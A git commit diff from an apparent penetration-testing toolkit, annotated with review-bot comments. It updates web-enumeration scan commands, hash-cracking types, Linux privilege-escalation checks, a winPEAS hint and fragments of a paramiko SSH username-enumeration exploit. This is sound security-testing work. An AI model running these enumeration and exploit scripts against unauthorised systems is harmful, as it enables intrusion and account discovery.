This commit is contained in:
Roman Hergenreder 2021-06-30 20:44:38 +02:00
parent 1891efe2e4
commit efc3b655a8
14 changed files with 1245 additions and 1351 deletions

@ -221,7 +221,12 @@ def calculate_elapsed_time(start_time):
async def read_stream(stream, target, tag='?', patterns=[], color=Fore.BLUE): async def read_stream(stream, target, tag='?', patterns=[], color=Fore.BLUE):
address = target.address address = target.address
while True: while True:
line = ""
try:
line = await stream.readline() line = await stream.readline()
except ValueError:
continue
if line: if line:
line = str(line.rstrip(), 'utf8', 'ignore') line = str(line.rstrip(), 'utf8', 'ignore')
debug(color + '[' + Style.BRIGHT + address + ' ' + tag + Style.NORMAL + '] ' + Fore.RESET + '{line}', color=color) debug(color + '[' + Style.BRIGHT + address + ' ' + tag + Style.NORMAL + '] ' + Fore.RESET + '{line}', color=color)
@ -878,4 +883,3 @@ def main():
if __name__ == '__main__': if __name__ == '__main__':
main() main()
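Review bot: The new `except ValueError: continue` around the readline call silently discards a line that overran the reader's buffer limit (if `stream` is an asyncio StreamReader, that is the case in which readline raises ValueError), so any `patterns` match in that output is lost without a trace. At minimum log the drop so the operator knows output was skipped, e.g. `except ValueError as err:` / `debug(color + '[' + Style.BRIGHT + address + ' ' + tag + Style.NORMAL + '] ' + Fore.RESET + 'dropped oversized line: ' + str(err), color=color)` / `continue`. The newly added `line = ""` before the `try` is also dead once the except branch continues, since `line` is always assigned on the path that reaches `if line:`. read_stream's body continues past the end of the hunk.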

@ -59,7 +59,7 @@ service-names = [
] ]
[[finger.scan]] [[finger.scan]]
nmap = 'nmap-finger' name = 'nmap-finger'
command = 'nmap {nmap_extra} -sV -p {port} --script="banner,finger" -oN "{scandir}/{protocol}_{port}_finger_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_finger_nmap.xml" {address}' command = 'nmap {nmap_extra} -sV -p {port} --script="banner,finger" -oN "{scandir}/{protocol}_{port}_finger_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_finger_nmap.xml" {address}'
[ftp] [ftp]
@ -126,8 +126,8 @@ ignore-service-names = [
command = 'whatweb --color=never --no-errors -a 3 -v {scheme}://{address}:{port} 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_whatweb.txt"' command = 'whatweb --color=never --no-errors -a 3 -v {scheme}://{address}:{port} 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_whatweb.txt"'
[[http.scan]] [[http.scan]]
name = 'ffuf' name = 'feroxbuster'
command = 'ffuf -u {scheme}://{address}:{port}/FUZZ -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf.txt' command = 'feroxbuster -u {scheme}://{address}:{port} -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -o {scandir}/{protocol}_{port}_{scheme}_feroxbuster.txt'
[[http.manual]] [[http.manual]]
description = '(nikto) old but generally reliable web server enumeration tool' description = '(nikto) old but generally reliable web server enumeration tool'
@ -136,10 +136,10 @@ ignore-service-names = [
] ]
[[http.manual]] [[http.manual]]
description = '(ffuf) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:' description = '(feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:'
commands = [ commands = [
'ffuf -u {scheme}://{address}:{port}/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf_big.txt', 'feroxbuster -u {scheme}://{address}:{port} -t 10 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -o {scandir}/{protocol}_{port}_{scheme}_feroxbuster_big.txt',
'ffuf -u {scheme}://{address}:{port}/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf_dirbuster.txt' 'feroxbuster -u {scheme}://{address}:{port} -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -o {scandir}/{protocol}_{port}_{scheme}_feroxbuster_dirbuster.txt'
] ]
[[http.manual]] [[http.manual]]
@ -159,8 +159,8 @@ ignore-service-names = [
[[http.manual]] [[http.manual]]
description = '(gobuster v3) Directory/file enumeration for web servers using various wordlists (same as dirb above):' description = '(gobuster v3) Directory/file enumeration for web servers using various wordlists (same as dirb above):'
commands = [ commands = [
'gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e -k -l -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_big.txt"', 'gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e -k -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_big.txt"',
'gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -l -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_dirbuster.txt"' 'gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_dirbuster.txt"'
] ]
[[http.manual]] [[http.manual]]
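Review bot: The feroxbuster commands added in the http.scan and http.manual hunks pass `-n` (no recursion) while the accompanying description still reads "Multi-threaded recursive directory/file enumeration", so either the flag or the wording is wrong; drop `-n` or reword to `description = '(feroxbuster) Multi-threaded directory/file enumeration for web servers using various wordlists:'`. The same commands pass the output path unquoted (`-o {scandir}/{protocol}_{port}_{scheme}_feroxbuster.txt`) whereas the whatweb and gobuster entries in this file quote theirs, so a `scandir` containing a space would split the argument; quote it as `-o "{scandir}/{protocol}_{port}_{scheme}_feroxbuster.txt"` in all three places.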

@ -65,6 +65,7 @@ class HashType(enum.Enum):
LM = 3000 LM = 3000
NTLM = 1000 NTLM = 1000
MSSQL = 1731 MSSQL = 1731
NTLMV2_SSP = 5600
# Kerberos # Kerberos
KERBEROS_AS_REQ = 7500 KERBEROS_AS_REQ = 7500
@ -109,9 +110,15 @@ class Hash:
elif crypt_type == "S": elif crypt_type == "S":
self.type.append(HashType.DRUPAL7) self.type.append(HashType.DRUPAL7)
else: else:
self.isSalted = ":" in raw_hash if ":" in raw_hash:
if self.isSalted: parts = raw_hash.split(":")
if len(parts) == 2:
self.isSalted = True
raw_hash, self.salt = raw_hash.split(":") raw_hash, self.salt = raw_hash.split(":")
elif len(parts) == 6:
self.type.append(HashType.NTLMV2_SSP)
# Base64 -> hex # Base64 -> hex
try: try:
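Review bot: The rewritten colon branch in the Hash hunk no longer assigns `self.isSalted` when the split yields neither 2 nor 6 parts (the old code set it unconditionally from `":" in raw_hash`), so unless the attribute is initialised earlier in the constructor, outside this hunk, it may be left unset for such inputs. The six-part NTLMV2_SSP case also falls straight through to the `# Base64 -> hex` conversion that follows, which presumably is not meant for a colon-separated NetNTLMv2 string; consider skipping the conversion for that type and adding an explicit `else` that records the unrecognised format. Minor: `parts` is already split, so the two-part branch can read `raw_hash, self.salt = parts` instead of splitting again. The enclosing method starts and ends outside the hunk.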

@ -132,7 +132,7 @@ class HttpFileServer(HTTPServer):
data = data.encode("UTF-8") data = data.encode("UTF-8")
# return 200 - OK and data # return 200 - OK and data
self.addRoute(name, lambda req: (data, 200)) self.addRoute(name, lambda req: (200, data))
def dumpRequest(self, name): def dumpRequest(self, name):
self.dumpRequests.append(self.cleanPath(name)) self.dumpRequests.append(self.cleanPath(name))
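Review bot: The comment above the changed lambda, `# return 200 - OK and data`, now lists the two values in the opposite order to the tuple it describes, `(200, data)`; since the fix is precisely about the order the route dispatcher expects, make the comment state it, e.g. `# route handlers return (status, body): 200 - OK and data`. If other handlers registered through addRoute elsewhere in the file still return `(data, 200)` they would need the same swap, but that cannot be confirmed from this hunk.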

2347
linpeas.sh


14
lse.sh

@ -5,7 +5,7 @@
# Author: Diego Blanco <diego.blanco@treitos.com> # Author: Diego Blanco <diego.blanco@treitos.com>
# GitHub: https://github.com/diego-treitos/linux-smart-enumeration # GitHub: https://github.com/diego-treitos/linux-smart-enumeration
# #
lse_version="3.2" lse_version="3.3"
#( Colors #( Colors
# #
@ -582,8 +582,8 @@ lse_run_tests_users() {
#other users in an administrative group #other users in an administrative group
lse_test "usr020" "1" \ lse_test "usr020" "1" \
"Are there other users in an administrative groups?" \ "Are there other users in administrative groups?" \
'grep $lse_grep_opts -E "^(adm|admin|root|sudo|wheel)" /etc/group | grep -Ev ":$" | grep $lse_grep_opts -Ei ":[a-z_-]+\$"' 'grep $lse_grep_opts -E "^(adm|admin|root|sudo|wheel)" /etc/group | grep -Ev ":$|:$lse_user$" | grep $lse_grep_opts -Ei ":[,a-z_-]+\$"'
#other users with shell #other users with shell
lse_test "usr030" "1" \ lse_test "usr030" "1" \
@ -960,7 +960,7 @@ lse_run_tests_recurrent_tasks() {
#can we write to any paths present in cron tasks? #can we write to any paths present in cron tasks?
lse_test "ret050" "1" \ lse_test "ret050" "1" \
"Can we write to any paths present in cron jobs" \ "Can we write to any paths present in cron jobs" \
'for p in `grep --color=never -hERoi "/[a-z0-9_/\.\-]+" /etc/cron* | sort -u`; do [ -w "$p" ] && echo "$p"; done' \ 'for p in `grep --color=never -hERoi "/[a-z0-9_/\.\-]+" /etc/cron* | grep -Ev "/dev/(null|zero|random|urandom)" | sort -u`; do [ -w "$p" ] && echo "$p"; done' \
"" \ "" \
"lse_user_writable_cron_paths" "lse_user_writable_cron_paths"
@ -980,7 +980,7 @@ lse_run_tests_recurrent_tasks() {
#user timers #user timers
lse_test "ret500" "1" \ lse_test "ret500" "1" \
"User systemd timers" \ "User systemd timers" \
'systemctl --user list-timers --all | grep -Ev "(^$|timers listed)"' 'systemctl --user list-timers --all | grep -iq "\.timer" && systemctl --user list-timers --all'
#can we write in any system timer? #can we write in any system timer?
lse_test "ret510" "0" \ lse_test "ret510" "0" \
@ -1026,7 +1026,7 @@ lse_run_tests_network() {
#nameservers #nameservers
lse_test "net530" "2" \ lse_test "net530" "2" \
"Namerservers" \ "Nameservers" \
'grep "nameserver" /etc/resolv.conf' 'grep "nameserver" /etc/resolv.conf'
#systemd nameservers #systemd nameservers
@ -1187,7 +1187,7 @@ lse_run_tests_software() {
#check if there are ssh private keys in ssh-agent #check if there are ssh private keys in ssh-agent
lse_test "sof050" "0" \ lse_test "sof050" "0" \
"Are there private keys in ssh-agent?" \ "Are there private keys in ssh-agent?" \
'ssh-add -l' 'ssh-add -l | grep -iv "agent has no identities"'
#check if there are gpg keys in gpg-agent #check if there are gpg keys in gpg-agent
lse_test "sof060" "0" \ lse_test "sof060" "0" \

socat Normal file


@ -26,9 +26,7 @@ class InvalidUsername(Exception):
def add_boolean(*args, **kwargs): def add_boolean(*args, **kwargs):
pass pass
old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
old_service_accept = paramiko.auth_handler.AuthHandler._handler_table[
paramiko.common.MSG_SERVICE_ACCEPT]
def service_accept(*args, **kwargs): def service_accept(*args, **kwargs):
paramiko.message.Message.add_boolean = add_boolean paramiko.message.Message.add_boolean = add_boolean
@ -55,14 +53,14 @@ def _paramiko_tunnel(username, *args, **kwargs):
return return
try: try:
transport.auth_publickey(us, paramiko.RSAKey.generate(2048)) transport.auth_publickey(us, paramiko.RSAKey.generate(2048))
except InvalidUsername: except InvalidUsername or socket.error:
print ('[*] {} - Invalid username'.format(us)) print ('[*] {} - Invalid username'.format(us))
except paramiko.ssh_exception.AuthenticationException: except paramiko.ssh_exception.AuthenticationException:
print ('[+] {} - Valid username'.format(us)) print ('[+] {} - Valid username'.format(us))
return return
paramiko.auth_handler.AuthHandler._handler_table.update({ paramiko.auth_handler.AuthHandler._client_handler_table.update({
paramiko.common.MSG_SERVICE_ACCEPT: service_accept, paramiko.common.MSG_SERVICE_ACCEPT: service_accept,
paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure
}) })
@ -81,7 +79,3 @@ if args.wordlist is not None:
for u in f: for u in f:
usernames.append(u) usernames.append(u)
pool.map(_paramiko_tunnel, usernames) pool.map(_paramiko_tunnel, usernames)
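Review bot: `except InvalidUsername or socket.error:` on the changed line does not catch `socket.error` — the expression `InvalidUsername or socket.error` evaluates to `InvalidUsername` alone, so a socket error still propagates out of the worker; the intended form is a tuple, `except (InvalidUsername, socket.error):`. Even then, reporting a socket error under the `Invalid username` message conflates a transport failure with a result, so a separate `except socket.error as err:` branch that prints the error is clearer. `_paramiko_tunnel` starts outside this hunk.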

@ -16,6 +16,8 @@ from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337" BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
USERNAME = "admin"
PASSWORD = "password"
def login(username, password): def login(username, password):
# Template method to create a session # Template method to create a session
@ -32,7 +34,7 @@ def exploit(session, payload):
pass pass
if __name__ == "__main__": if __name__ == "__main__":
session = login() session = login(USERNAME, PASSWORD)
exploit(session, "id") exploit(session, "id")
""" % baseUrl """ % baseUrl



@ -451,7 +451,7 @@ CALL :T_Progress 1
:UnquotedServicePaths :UnquotedServicePaths
CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS" CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS"
ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Progam.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe' ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
ECHO. [i] The permissions are also checked and filtered using icacls ECHO. [i] The permissions are also checked and filtered using icacls
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do ( for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (


win/ysoserial/ysoserial.exe Normal file
